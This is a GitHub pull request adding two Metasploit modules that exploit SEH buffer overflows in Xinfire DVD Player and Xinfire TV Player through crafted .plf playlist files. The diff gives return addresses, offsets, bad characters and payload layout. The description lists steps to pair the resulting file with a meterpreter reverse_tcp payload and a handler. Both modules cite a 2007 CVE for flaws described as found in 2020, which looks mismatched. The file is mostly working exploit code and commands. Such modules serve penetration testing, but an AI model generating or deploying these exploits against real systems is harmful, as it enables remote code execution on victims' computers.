### PR TITLE
add to metasploit /modules/exploits/windows/fileformat/xinfire_dvd_pl…

### DIFF
--- a/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xinfire DVD Player Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in Xinfire DVD Player Pro and Standard v5.5.0.0.When
+        the application is used to import a specially crafted plf file, a buffer overflow occurs
+        allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom', # MSF Module and Vulnerability discovery /metacom27@gmail.com
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2007-3068' ],
+          [ 'OSVDB', '36956' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'BadChars' => "\x00\x0a\x0d\x1a\x20",
+          'Space' => 1000,
+        },
+      'Platform' => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal', { 'Ret' => 0x6160174F, 'Offset' => 608 } ],	# p/p/r EPG.dll
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 15 2020',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
+      ])
+
+  end
+
+  def exploit
+
+    buffer = rand_text(target['Offset'])  #junk
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded  # 1000 bytes of space
+    # more junk may be needed to trigger the exception
+
+    file_create(buffer)
+
+  end
+end

--- a/modules/exploits/windows/fileformat/xinfire_tv_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_tv_player.rb
@@ -1,0 +1,65 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xinfire TV Player Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a buffer overflow in Xinfire TV Player Pro and Standard v6.0.1.2. When the application is used
+        to import a specially crafted plf file, a buffer overflow occurs allowing arbitrary code execution. Tested Win7, Win10. This software is similar as Aviosoft Digital TV Player and BlazeVideo HDTV Player.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom', # MSF Module and Vulnerability discovery /metacom27@gmail.com
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2007-3068' ],
+          [ 'OSVDB', '36956' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
+          'Space' => 1384,
+        },
+      'Platform' => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal', { 'Ret' => 0x613018E9, 'Offset' => 608 } ],	# p/p/r DTVDeviceManager.dll
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 16 2020',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
+      ])
+
+  end
+
+  def exploit
+
+    buffer = rand_text(target['Offset'])  #junk
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded  # 1384 bytes of space
+    # more junk may be needed to trigger the exception
+
+    file_create(buffer)
+
+  end
+end


### PR DESCRIPTION
…ayer

Verification

use exploit/windows/fileformat/xinfire_dvd_player

set payload windows/meterpreter/reverse_tcp

set lhost (IP of Local Host)

exploit

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost (IP of Local Host)

exploit

Video demo Buffer Overflow Xinfire DVD Player https://youtu.be/IqTO7WNJO24

downloads software https://download.cnet.com/Xinfire-TV-Player-Pro/3000-13632_4-75986988.html

Vulnerable Application open plf file on (playlist), and the vulnerability is triggered.

Targets Win 7 and Win 10


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

